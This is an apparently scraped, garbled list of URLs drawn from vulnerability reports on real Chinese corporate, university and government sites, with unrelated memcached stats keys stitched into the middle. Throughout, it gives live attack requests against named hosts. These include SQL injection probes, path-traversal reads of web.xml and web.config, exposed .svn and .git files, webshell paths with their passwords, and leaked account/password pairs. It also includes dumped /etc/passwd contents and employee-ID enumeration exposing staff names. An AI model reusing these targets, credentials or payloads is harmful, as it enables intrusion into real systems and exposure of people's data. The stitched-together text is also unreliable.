http://gte.cnoocgas.com:8080/filemanage/ http://gte.cnoocgas.com:8080/filemanage/check_position_count.jsp?userid=admin&password=admin http://gte.cnoocgas.com:8080/filemanage/ http://su8.cn/MemInfo/UsePersonSaveEdit?Cpid=2785 http://su8.cn http://su8.cn/MemInfo/MemCusOrder http://kpi.ecnu.edu.cn https://oneapm.kf5.com/request/new/?_ga=1.230321628.1561433711.1446613755 https://user.oneapm.com/account/profile.do https://oneapm.kf5.com/community/question/id/3276/都存在 https://github.com/jiangguiqiang199/social/blob/427752da424714ce245aa0d8d276cebc7cf58caa/social/social-ModuleParent/socialEmail/src/main/java/com/social/email/utils/email/MailTest.java 
http://**.**.**.**/?dename=&pages=1&userType=all&thid=&pageNum=10&token=e1599e23890dbe4647e8af422ecbe944&mod=sel_freeScenicList&calls=2&keyword= http://gte.cnoocgas.com:8080/portal http://gte.cnoocgas.com:8080/portal/news/download.jsp?urli=/WEB-INF/web.xml&filename=1.txt http://gte.cnoocgas.com:8080/portal/download.jsp?urli=/WEB-INF/web.xml&filename=1.txt http://gte.cnoocgas.com:8080/portal/webstamp/download.jsp?urli=/WEB-INF/web.xml&filename=1.txt http://su8.cn/Forgotpwd/Forgotpwd1 http://su8.cn http://su8.cn/Forgotpwd/Forgotpwd4 http://km.qk365.com/ http://osp.voicecloud.cn/index.php/ajax/qa/outexport?qa_id=125798 http://e-bai.cn/login/login_login.action存在命令执行漏洞 http://e-bai.cn/tst1.jsp密码tom http://www.qianxs.com/mrMoney/mobile/invite/member/queryInvestStatV2.html?mId=MR03010000 http://www.qianxs.com/mrMoney/mobile/invite/member/queryInvestStatV2.html?mId=MR03133445 http://gm.mm.gtarcade.com/ http://hi.haidilao.com/pages/haidl/alter_password.jsp http://111.13.46.70:8020/index.php/Index/Basic/contacts.html http://gte.cnoocgas.com:8080/gfmis/gfmis.war.rar http://gte.cnoocgas.com:8080/gfmis/checkusercodelevel.jsp?verifyCode=6619&userid=admin http://gte.cnoocgas.com:8080/gfmis/ http://gte.cnoocgas.com:8080/gpqhseoa http://gte.cnoocgas.com:8080/gpqhseoa/checkusercodelevel.jsp?userid=admin http://site.hiall.com.cn/www.tar http://site.hiall.com.cn/i.php http://www.swedmp.ecnu.edu.cn www.swedmp.ecnu.edu.cn http://kz.qk365.com/index/cmrepair.do?type=1未授权访问 http://**.**.**.**/zhtj_webservice_rs/LoginService.asmx?WSDL http://**.**.**.**/UserLogin http://**.**.**.**/zhtj_webservice_rs/LoginService.asmx?WSDL http://m.hongkongairlines.com/ http://drops.wooyun.org/tips/2078 http://m.hongkongairlines.com/ci/index.php/state/analysis http://lsc.ecnu.edu.cn http://**.**.**.**:80/CHN/About/newsShow.asp?news_id=425%20AND%203*2*1%3d6%20AND%20612%3d612 http://www.aodianyun.com/.svn/entries http://openapi.aodianyun.com/.svn/entries http://pic.aodianyun.com/.svn/entries 
http://vod.aodianyun.com/.svn/entries http://wx.aodianyun.com/.svn/entries http://**.**.**.** http://**.**.**.**/ascm/index.jsp http://ac.haidilao.com/ http://ac.haidilao.com/DownLoadPage.aspx?FileName=/web.config http://ac.haidilao.com/WebServices/WebServiceSSOUser.asmx/GetUserList http://**.**.**.**:80/person/search.action http://**.**.**.**:80/person/search.action http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** www3.ftchinese.com www1.ftchinese.com http://www.srcc.ecnu.edu.cn/NewsType.asp?BigClass=-1 http://my.ikang.com/pay/success?state=1&groupType=0&examId=20000111&connectMis=1&orderId=21051000&packCategory=1 http://**.**.**.**/?act=viewpro&do=companyjobs&userid=4059 http://**.**.**.**/?act=viewpro&do=companyjobs&userid=4059 http://lxs.ecnu.edu.cn/download.do?id=102&method=download https://153.36.236.94/ http://m.hongkongairlines.com/ https://m.hongkongairlines.com/html_php/cabin/guest_list.php http://**.**.**.**/content.jsp?ID=284 http://**.**.**.**:80/eservices/index-nav.jsp?_menu=menu7 http://59.151.86.7:9200/_search 
http://101.227.12.143:8080/ http://101.227.12.143:8080/jsp/userAdd.jsp http://101.227.12.143:8080/custom/source/list.jsp/code http://**.**.**.**/index/search/incard/* http://cater.haidilao.com/Cater/app/proxyApp.action?model=1&uri=getuserinfo http://**.**.**.**/news.php?sid=7 http://px.qk365.com/ http://developer.baidu.com http://developer.baidu.com/forum/topic/show?topicId=2856 http://**.**.**.**/php/promanage/orgaction.php?type=2&org=9 http://m.iqianjin.com/user/login?referrer=/user/register http://jy.cdp.edu.cn:8050/Home/regist通过注册点 http://tsg.scujcc.cn/aspx.aspx http://jituan.b2b.cn/category/Category/list?cid=305 http://corp.b2b.cn/category/Category/list?cid=325 http://www.faw.com.cn/uddiexplorer/ http://www.faw.com.cn/uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.7.91.254:80&rdoSearch=name&txtSearchname=&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search http://xs.qk365.com/welcome.do http://www.tlqh.com.cn/manager/Login.aspx)处用burp抓一下包,保存一下放入sql里面跑。 http://field.mapbar.com:80/mapbar-fieldwork/pwdfind/pwdfind!main.action存在命令执行漏洞 https://field.mapbar.com/mgisx-framework-login/test.jsp密码tom http://tj.xjsch.com http://px.qk365.com/default.aspx http://px.qk365.com items:1:number items:1:age items:1:evicted items:1:evicted_nonzero items:1:evicted_time items:1:outofmemory items:1:tailrepairs items:1:reclaimed items:1:expired_unfetched items:1:evicted_unfetched items:7:number items:7:age items:7:evicted items:7:evicted_nonzero items:7:evicted_time items:7:outofmemory items:7:tailrepairs items:7:reclaimed items:7:expired_unfetched items:7:evicted_unfetched items:8:number items:8:age items:8:evicted items:8:evicted_nonzero items:8:evicted_time items:8:outofmemory items:8:tailrepairs items:8:reclaimed items:8:expired_unfetched items:8:evicted_unfetched items:9:number items:9:age items:9:evicted items:9:evicted_nonzero items:9:evicted_time items:9:outofmemory items:9:tailrepairs items:9:reclaimed items:9:expired_unfetched 
items:9:evicted_unfetched items:10:number items:10:age items:10:evicted items:10:evicted_nonzero items:10:evicted_time items:10:outofmemory items:10:tailrepairs items:10:reclaimed items:10:expired_unfetched items:10:evicted_unfetched items:11:number items:11:age items:11:evicted items:11:evicted_nonzero items:11:evicted_time items:11:outofmemory items:11:tailrepairs items:11:reclaimed items:11:expired_unfetched items:11:evicted_unfetched items:12:number items:12:age items:12:evicted items:12:evicted_nonzero items:12:evicted_time items:12:outofmemory items:12:tailrepairs items:12:reclaimed items:12:expired_unfetched items:12:evicted_unfetched items:13:number items:13:age items:13:evicted items:13:evicted_nonzero items:13:evicted_time items:13:outofmemory items:13:tailrepairs items:13:reclaimed items:13:expired_unfetched items:13:evicted_unfetched items:14:number items:14:age items:14:evicted items:14:evicted_nonzero items:14:evicted_time items:14:outofmemory items:14:tailrepairs items:14:reclaimed items:14:expired_unfetched items:14:evicted_unfetched items:15:number items:15:age items:15:evicted items:15:evicted_nonzero items:15:evicted_time items:15:outofmemory items:15:tailrepairs items:15:reclaimed items:15:expired_unfetched items:15:evicted_unfetched items:16:number items:16:age items:16:evicted items:16:evicted_nonzero items:16:evicted_time items:16:outofmemory items:16:tailrepairs items:16:reclaimed items:16:expired_unfetched items:16:evicted_unfetched items:17:number items:17:age items:17:evicted items:17:evicted_nonzero items:17:evicted_time items:17:outofmemory items:17:tailrepairs items:17:reclaimed items:17:expired_unfetched items:17:evicted_unfetched items:18:number items:18:age items:18:evicted items:18:evicted_nonzero items:18:evicted_time items:18:outofmemory items:18:tailrepairs items:18:reclaimed items:18:expired_unfetched items:18:evicted_unfetched items:19:number items:19:age items:19:evicted items:19:evicted_nonzero items:19:evicted_time 
items:19:outofmemory items:19:tailrepairs items:19:reclaimed items:19:expired_unfetched items:19:evicted_unfetched items:20:number items:20:age items:20:evicted items:20:evicted_nonzero items:20:evicted_time items:20:outofmemory items:20:tailrepairs items:20:reclaimed items:20:expired_unfetched items:20:evicted_unfetched items:21:number items:21:age items:21:evicted items:21:evicted_nonzero items:21:evicted_time items:21:outofmemory items:21:tailrepairs items:21:reclaimed items:21:expired_unfetched items:21:evicted_unfetched items:22:number items:22:age items:22:evicted items:22:evicted_nonzero items:22:evicted_time items:22:outofmemory items:22:tailrepairs items:22:reclaimed items:22:expired_unfetched items:22:evicted_unfetched items:23:number items:23:age items:23:evicted items:23:evicted_nonzero items:23:evicted_time items:23:outofmemory items:23:tailrepairs items:23:reclaimed items:23:expired_unfetched items:23:evicted_unfetched http://p.qk365.com/welcome.do http://p.qk365.com/welcome.do http://p.qk365.com/welcome.do http://p.qk365.com/welcome.do http://**.**.**.**/zxDoctorInformation.aspx?ID=20 http://**.**.**.**/webportal/loginSp/userLogin.action http://**.**.**.**/webportal/data.jsp?z0=utf-8 http://**.**.**.**/webportal/wuyun.jsp https://**.**.**.**/wangxuact/php-ihome/blob/c38b1160d0022d1306e566f78125ecc4408e9d35/ihome/data/data_mail.php http://**.**.**.**/ https://github.com/brian6peng/curiosity/blob/76d3a9f68783616a5a7d4b5fb1746a01177c4789/Curiosity/Program.cs http://kz.qk365.com/index/welcome.do http://kz.qk365.com:80/index/cmacc.do?type=0 http://kz.qk365.com:80/index/cmaudit.do?type=0 http://kz.qk365.com:80/index/cmrepair.do?type=0 http://kz.qk365.com:80/index/cmfault.do?type=0 http://www.jiajiao.ecnu.edu.cn/fwzx_details.aspx?id=66 http://www.jiajiao.ecnu.edu.cn/fwzx_details.aspx?id=66 http://**.**.**.**/static_content_view.php?id=14 http://**.**.**.**/ http://www.scient.com.cn/user.php http://kq2.qk365.com http://dk.qk365.com/welcome.do 
http://dk.qk365.com/welcome.do http://dk.qk365.com/welcome.do http://dk.qk365.com/welcome.do http://dk.qk365.com/301.jsp http://www.xinyidai.cn/invesRecord/invesRecord!findShow?key=e070c3782a5c4851ba18ff13fc76960b&page=1 http://www.xinyidai.cn/invesRecord/invesRecord!findShow?key=e070c3782a5c4851ba18ff13fc76960b*&page=1 http://bd.juhangye.com/wl/userAction!shopping.action存在命令执行漏洞 http://ems.qk365.com/welcome.do https://zc.urtrust.com.cn:9093/casserver/login?service=http%3A%2F%2Fzc.urtrust.com.cn%3A9080%2Fprpall%2Fcommon%2Fpub%2FUIModelCodeQueryInput.jsp%3FComCode%3D9320603 https://zc.urtrust.com.cn:9093/casserver/notes.jsp?systemCode=prpall http://58.211.236.158:8080/infol/login.jsp http://58.211.236.158:8080/invoker/JMXInvokerServlet admin:service=DeploymentFileRepository http://www.qk365.com/news/elive/infoRight_ajax.do?channelParPagemark=1&hotTopic=1&num=8&siteid=6ec601fd-69a0-4469-a6f7-d1edb7136481&titleLen=20 www.qk365.com/news/elive/infoRight_ajaxLink.do?classPagemark=*&num=99&siteid=6ec601fd-69a0-4469-a6f7-d1edb7136481 http://www.appstar.com.cn http://**.**.**.**/dwbm_bminfoshow.do?bmid=1 http://**.**.**.**/dwbm_bminfoshow.do?bmid=900 http://**.**.**.**/dwbm_bminfoshow.do?bmid=400 http://**.**.**.**/dwbm_bminfoshow.do?bmid=9854【9000多个人员】 http://**.**.**.**/dwbm_bminfoshow.do?bmid=3600 http://**.**.**.**/dwbm_bminfoshow.do?bmid=61091【六万多数据呀】 http://**.**.**.**/dwbm_bminfoshow.do?bmid=550 http://**.**.**.**/dwbm_bminfoshow.do?bmid=37000 http://**.**.**.**/dwbm_bminfoshow.do?bmid=5000 http://**.**.**.**/dwbm_bminfoshow.do?bmid=67000 http://**.**.**.**/index.shtml http://**.**.**.**/dwbm_bminfoshow.do?bmid=3000 http://**.**.**.**/dwbm_bminfoshow.do?bmid=90000 http://oa.juran.com.cn:8086/invoker/JMXInvokerServlet http://material.mediav.com/compile/m2/.svn/entries http://hr.qk365.com/home http://login.italk24.com/createorder!createOrder.action http://**.**.**.**/default/contents/content/i/* http://kq2.qk365.com/login http://bx.qk365.com:51106/ 
http://bx.qk365.com:51106/index/cmacc.do?type=0 http://jzcg.faw.com.cn/home.jsp Name:WIN-CAGAHJRCDME Version:Windows Description:Microsoft http://218.2 system:type=ServerInfo http://218.2 system:type=ServerInfo jdbc:oracle:thin:@localhost:1521:orcl http://**.**.**.**:85/Default.aspx# http://oa.qk365.com http://**.**.**.**/managers/logon.action存在命令执行漏洞 http://**.**.**.**/jcms/bfdh_qh.jsp http://service2.winic.org/Service.asmx?op=GET_MSP_MO http://oa2.qk365.com/web.rar https://github.com/xiaomincui/100allin https://github.com/xiaomincui/100allin/blob/master/web.config https://github.com/xiaomincui/100allin/blob/25c7294440612e2d5cdbe924b33e59ea88b01c39/admin/usercontrols/adminleft.ascx.cs https://github.com/xiaomincui/100allin/blob/master/bbsmessage/login.aspx.cs http://**.**.**.**:8050/Upload/Unit/YYZZ/aspx.aspx http://**.**.**.**:89/login.do http://**.**.**.**/bugs/wooyun-2015-0135000 http://**.**.**.**:89/verifyLogin.do?clienttype=Webclient&clientver=4.5&country=&language=&loginid=sysadmin'and'1'%3D'1&password=s4&verify= http://**.**.**.**:89/verifyLogin.do?clienttype=Webclient&clientver=4.5&country=&language=&loginid=sysadmin'and'1'%3D'2&password=s4&verify= http://client.wochacha.com/price/list?gcsid=b162bfa72dee4c3a286122259162b65f&id=1350082&query=%E8%8B%8F%E8%8F%B2&reid=494 http://**.**.**.**/Login/Login.aspx?Logout=true https://mail.tujia.com/ pass:Www.tujia.com http://**.**.**.** http://qun.jikexueyuan.com/javaweb?page_count=10&type=1&subject=38 http://www.nuomi.com/uc/order/ http://**.**.**.**/user/login.action?method=check存在命令执行漏洞 http://**.**.**.**/test.jsp密码tom http://**.**.**.**:7788/szinfo/Login_indexPage http://**.**.**.**:7788/szinfo/authority/saleSysRoleAction!listRole?user_id=LIYK35&uuid=15218963F227405B90707B4A77EEE3B50000&applySysId=Prepay http://cos.sto.cn/messager/MsgTemp.jsp?loginid=a http://cos.sto.cn/messager/MsgTemp.jsp?loginid=a'or'1'='1 http://cos.sto.cn/messager/MsgTemp.jsp?loginid=a'or'1'='2 http://wooyun.org/bugs/wooyun-2015-0150482 
http://qun.jikexueyuan.com/ http://qun.jikexueyuan.com/wiki/topic/22#editorBox http://www.laoyouka.com:80/flow.php?step=add_to_cart goods_id:359,number:2,parent:0,quick:1,spec:[*],yijian:1 http://**.**.**.**/edoas2/oa.jsp http://**.**.**.**/epstar/login/mixLogin.jsp http://**.**.**.**/epstar/servlet/RaqFileServer?action=save&fileName=/../test.jsp http://exs.qk365.com/welcome.do?loginResult= http://digi.m.aili.com/index.php?c=wap&m=column&channel=1 http://fashion.m.aili.com/index.php?c=wap&m=column&channel=1 http://beauty.m.aili.com/index.php?c=wap&m=column&channel=1 http://health.m.aili.com/index.php?c=wap&m=column&channel=1 http://baby.m.aili.com/index.php?c=wap&m=column&channel=1 http://men.m.aili.com/index.php?c=wap&m=column&channel=1 http://auto.m.aili.com/index.php?c=wap&m=column&channel=1 http://lifestyle.m.aili.com/index.php?c=wap&m=column&channel=1 http://play.m.aili.com/index.php?c=wap&m=column&channel=1 http://www.3ajinrong.com/market/lend/bidsbid root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin www:x:500:500::/alidata/www:/sbin/nologin mysql:x:501:501::/home/mysql:/sbin/nologin 
http://**.**.**.**/manage/Login.asp http://**.**.**.**/index.action?request_locale=zh_TW dir:/opt/EnterprisePlatform-4.3.0.GA_CP05/jboss-as/server/production/./tmp/deploy/tmp8005383656729047945FrontEnd-exp.war/ http://www.doctorpda.cn/about/us# http://www.med330.cn/ti.action存在命令执行漏洞 http://m.sh2.daoyoudao.com/ http://**.**.**.**/login?server=134403&url=http://**.**.**.**/index.action&context=&root=1&auth=a27709 http://tj.qk365.com/welcome.do dir:/usr/local/webapps/BossStat/ root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin w3master:x:500:500::/home/w3master:/bin/bash nginx:x:501:501::/home/nginx:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin nagios:x:502:502::/home/nagios:/bin/bash apache:x:48:48:Apache:/var/www:/sbin/nologin cacti:x:503:503::/home/cacti:/bin/bash 
mysql:x:504:504::/home/mysql:/sbin/nologin http://dj.qk365.com/PartyBuilding/welcome.do http://dj.qk365.com/PartyBuilding/welcome.do http://kz.qk365.com/index/index/index/login.do http://61.190.20.51/kingdee/flow_design/flow_class_custom_add.jsp?class_id=1 http://v2ex.com/t/233645看到风先生的帖子 http://**.**.**.**/news/news_detail.php?id=28320 http://pm.qk365.com/welcome.do dir:/usr/local/webapps/ProjMgr/ http://news.sciencenet.cn/html/newscomm.aspx?nid=331093 http://**.**.**.**/security/login.jsp http://www.ecsuntrade.com/index/index_execute.html,链接地址http://www.ecsuntrade.com/index/footer/footer!about.action存在命令执行漏洞 www.faw3s.com/Member/MemberArea.aspx?ID=60 http://114.255.72.176/ipcc/login/logout.action http://114.255.72.176/ipcc/login/logout.action mysql:admin/admin) http://**.**.**.**/index.php/Index/page_content/kind/10/viewid/4/id/1346* http://**.**.**.**/EpointBigFileUpLoad/BigFileUpLoadStorage/bfe9b4d2-af7b-4691-925d-f7621ac36247/oracle%E8%B4%A6%E5%8F%B7.txt http://**.**.**.**/auth/login http://www.crvole.com.cn/ http://vip.crvole.com.cn/account/verifyEmail?email=1 http://180.166.182.60/login.jsp http://113.16.174.130:8080/manage/logon.jsp http://113.16.174.130:8080/manage/cms/attachment_old.jsp http://113.16.174.130:8080/manage/cms/attachment.jsp http://113.16.174.130:8080/manage/cms/attachment_apache.jsp http://113.16.174.130:8080/manage/cms/attachment_apache.jsp http://**.**.**.**/fgwjsp/gywm.jsp?channelid=535 http://daili.b2b.cn/Index!showIndex.action http://113.16.174.130:8080/manage/Library/userlist.jsp http://113.16.174.130:8080/tyzx/public/userlist.jsp http://113.16.174.130:8080/manage/usermanage/finduser.jsp?username=sysadmin http://113.16.174.130:8080/manage/usermanage/modifyuser.jsp?f=0.11192052964728694 http://acm.cs.ecnu.edu.cn/bbsread.php?id=3018&set=1 http://www.yjszs.ecnu.edu.cn www.yjszs.ecnu.edu.cn https://open.zhongan.com/open/login/resetPassWord.htm?resultCode=1 http://wj.haidilao.com http://**.**.**.**/bugs/wooyun-2010-0134808 
http://**.**.**.**/visitor/getPwdPhone.action http://**.**.**.**/upload//banner/images/2015/11/06/8464bedef46f44bb987893cc6689cf3e.php http://**.**.**.**/upload//banner/images/2015/11/06/6fd636cbfb7440e5b0ae0bcdd1c9526b.jsp http://www.51piao.com/Flight/FlightSale.aspx?Flag=2 http://www.51piao.com/Flight/FlightSale.aspx?Flag=2 http://**.**.**.**:9080 http://**.**.**.**:9080/xx.jsp http://**.**.**.**/Med_Insurance/hospitalList.aspx http://www.qinzhu.ecnu.edu.cn/ www.qinzhu.ecnu.edu.cn https://**.**.**.**/webui/Home.action存在命令执行漏洞 http://**.**.**.**/Exclusive.asp?id=-1 http://store.sf-express.com/emp/pic/614713.jpg(数字部分为顺丰工号,可以任意下载查看,如果用迅雷批量下载,可以得到所有人的头像,根据头像可以再划分有无分配的工号,可以逆向查找姓名和手机,此漏洞要是给相亲网站拿去了,会是咋样啊) http://i.sf-express.com/weiwap/showempinfo.html?empno=896599(任意修改后面工号可以得到所有员工的头像和姓名) http://i.sf-express.com/service/store/storeorder/employeeinfo?empCode=896599 http://i.sf-express.com/service/store/storeorder/employeeinfo?empCode=000001 http://smartvideo.youku.com/ https://github.com/xiaosongbk/AutoTest/blob/478419bf8c733b275a0d91840a2d67515055fa7a/newpiston_menu.py http://android.myapp.com/myapp/detail.htm?apkName=com.zhongan.insurance http://www.scude.cc/webpage/news.jsp?id=21143&na=%D1%A7%D4%BA%D0%C2%CE%C5&type=0 http://**.**.**.**/sms/sendsms http://**.**.**.**/sms.asmx?WSDL http://**.**.**.**/ http://**.**.**.**/login.aspx http://wooyun.org/bugs/wooyun-2015-0142693 http://blog.163.com/liwei1987821@126/blog/static/17266492820121092544348/ http://app.m.letv.com/android/mindex.phtml?version=3.3.0.1&pcode=010110106&mod=minfo&ctl=video&act=index&id=80103&vtype=m3u8 http://app.m.letv.com/android/mindex.phtml?version=3.3.0.1&pcode=010110106&mod=minfo&ctl=video&act=index&id=80103'&vtype=m3u8 http://app.m.letv.com/android/mindex.phtml?version=3.3.0.1&pcode=010110106&mod=minfo&ctl=video&act=index&id=80103'and'1'='1&vtype=m3u8 http://app.m.letv.com/android/mindex.phtml?version=3.3.0.1&pcode=010110106&mod=minfo&ctl=video&act=index&id=80103'and'1'='2&vtype=m3u8 
http://mail.nesc.cn http://fc09.etwealth.com http://n.gy-center.net:8080/login.action存在命令执行漏洞 http://webcache.googleusercontent.com/search?q=cache:E0FZlVur7YMJ:222.76.214.15/bank.sql+&cd=1&hl=zh-CN&ct=clnk&gl=jp http://**.**.**.**/lisms/action/loginAction.do?loginfre=loginfre http://jira.wecash.net/login.jsp https://github.com/shangES/ses/blob/a0bf0b736b95cdb00f091ffd7d970231dc0ab691/WebContent/WEB-INF/classes/application.properties http://dulife.baidu.com/device/1621 http://**.**.**.**/zongwu/ http://**.**.**.**/bfst/admin/db.inc.php?gateway=hfdydar2 http://**.**.**.**/web_manage/index.php http://**.**.**.**/uploadfile/upload/2011082203560054.php?gateway=hfdydar2 http://**.**.**.**/index22.php?gateway=hfdtdar2 http://**.**.**.**/data/log/miniUpload.php http://**.**.**.**/lzjs/2011-12-06/38.php?gateway=hfdydar2 http://**.**.**.**/userInfoEdit.jsp http://**.**.**.**/zongwu/biaozhun/baoxiu/articleviewsql.php?id=37 http://**.**.**.**/zongwu/biaozhun/mydecms/login.php http://**.**.**.**/zongwu/zwc/suguan/new/admin/login.php http://**.**.**.**/zongwu/sdnzx/admincp.php http://**.**.**.**/zongwu/zwc/fx/admin/login.php http://**.**.**.**/index/zxgkjjshow.asp?key=教学快报&id=321 http://**.**.**.**/index/imageshow.asp?id=24 http://**.**.**.**/asp/xinxidetail.asp?ID=656 http://**.**.**.**/index/admin/admin_login.asp http://**.**.**.**/zdsys/admin/admin.asp http://**.**.**.**/asp/bylw/cx.asp http://**.**.**.**/asp/admin.asp http://**.**.**.**/admin/index.php http://**.**.**.**/xg http://**.**.**.** http://**.**.**.**账号mpacc密码a111111 http://**.**.**.**/sklab账号xsun密码a222222 http://**.**.**.**/wylab用户wylab密码a222222 http://**.**.**.**/cxcy账号xxzz密码a222222 http://**.**.**.**/chlab账号qjzlab密码a11111 http://**.**.**.**/yjsjy账号lixiu密码a111111 http://**.**.**.**账号ngw密码888888 http://**.**.**.**账号houhx密码a11111 http://**.**.**.**/syzx账号zhaochq密码zcq1701 http://m.**.**.**.**/jump?u=http://**.**.**.**/&m=853640 http://m.**.**.**.**/jump?u= http://**.**.**.**/&m=853640“ 
http://**.**.**.**/index.html,点击图中标识链接 http://**.**.**.**:58083/siat-web/login/ssoLogin.action?Corp_ID=XMN298&MODULE=XMN298_inter.htm&gs=**.**.**.**存在命令执行漏洞 http://edu.cmbc.com.cn/pxindex/login.action)测试发现有验证码 http://edu.cmbc.com.cn/cas/login)抓包如下: http://edu.cmbc.com.cn/cas/login?service= http://wooyun.org/bugs/wooyun-2015-0148614 http://www.moretv.com.cn/.git/config https://120.132.60.26-- https://account.moretv.com.cn/ http://www.xibao360.com/ http://121.40.212.164/search/?q=1 http://**.**.**.**/sungirlbaby.sql https://sslvpn.faw.com.cn http://10.7.80.42:8080/cxm_new_old.jsp?new_code=wwwww&old_code=eeeeeeee http://www.thegitc.com/index.php/home/index/getPersonnelDetailed?id=5 http://www.thegitc.com/index.php/home/index/getNewsDetailed?id=176 http://**.**.**.** http://**.**.**.**/em/externalnetwork/personalInfoEntry.jsp http://**.**.**.**/bugs/wooyun-2010-07101 https://m.jindanlicai.com/apitwo/get_h5?view&pageName=settings/changecard&requestData={"status":3,"token":"f6c946370fe7b9c7f6048eaa753129c3","u_id":"535737 https://**.**.**.**/pukingli/lihongtu/blob/826470c915944a8e45c1ed215bdf8aad71e603e0/CIP2Project/Interface/WebApp/XmlModel/ConstParams.xml http://**.**.**.**/FrontFrame/ http://**.**.**.**/uploadfiles/ http://**.**.**.**/zcfg/ http://**.**.**.**/js/ http://**.**.**.**/admin/ http://**.**.**.**/css/ http://**.**.**.**/include/ http://**.**.**.**/doc http://**.**.**.**/xw/ http://**.**.**.**/bugs/wooyun-2010-0126808 http://daimayi.com/index.php/Loan/index/it_id/2* http://service.hundsun.com http://admin.rinhoo.com/admin/main.php seller.jinri.cn/test/ seller.jinri.cn/test/ portal.jinri.cn/portal.jinri.cn/ http://youxi.wasu.cn/offical.php?action=news_content&cid=724&tpl=mhj http://www.anbanghuwei.com:8000/seeyon/index.jsp http://www.anbanghuwei.com:8000/seeyon/logs/ctp.log http://**.**.**.**/ http://**.**.**.**/zcms/ http://**.**.**.**/ProductDetails.aspx?ProductID=9&from=2&tid=1 http://**.**.**.**/manage/login.html 
http://**.**.**.**/companycategory/?Command=Index&company_category_no=141 http://**.**.**.**/companycategory/?Command=Index&company_category_no=141 http://**.**.**.**/news/detail.asp?ID=20150507171034 http://**.**.**.**/news/detail.asp?ID=20150507171034 http://www.meilishuo.com/helpcenter/search/?title=hello http://61.135.152.231/webtrans/index.php?controller=user&action=login http://61.135.152.231/SetTime/index.php?time=%27set%7cset%26set%27 http://61.135.152.231/webbak/template/1.php encap:Ethernet c4:7a:08:7c:7c addr:61.135.152.231 Bcast:61.135.152.255 Mask:255.255.255.224 ec4:7aff:fe08:7c7c/64 Scope:Link MTU:1500 packets:5017795 packets:2704480 txqueuelen:1000 http://wx.miot.cn/i-21898?from=timeline&innid=21898&isappinstalled=0 http://wx.miot.cn/i-21898?from=timeline&innid=21898&isappinstalled=0 http://218.17.149.243:4567/manage/login.html css.hisense.com/HXCSS http://smfl.cn http://www.cpde.ecnu.edu.cn www.cpde.ecnu.edu.cn http://106.39.36.80:10007/File/2015/ http://www.nandaihe123.com/family/family_show.php?id=76 http://www.nandaihe123.com/family/family_show.php?id=76 http://**.**.**.**/hotel.asp?hid=11&lb=kf http://**.**.**.**/hotel.asp?hid=11&lb=kf http://supports.jiaju.sina.com.cn/api/weibo.php?action=send&type=1&content= 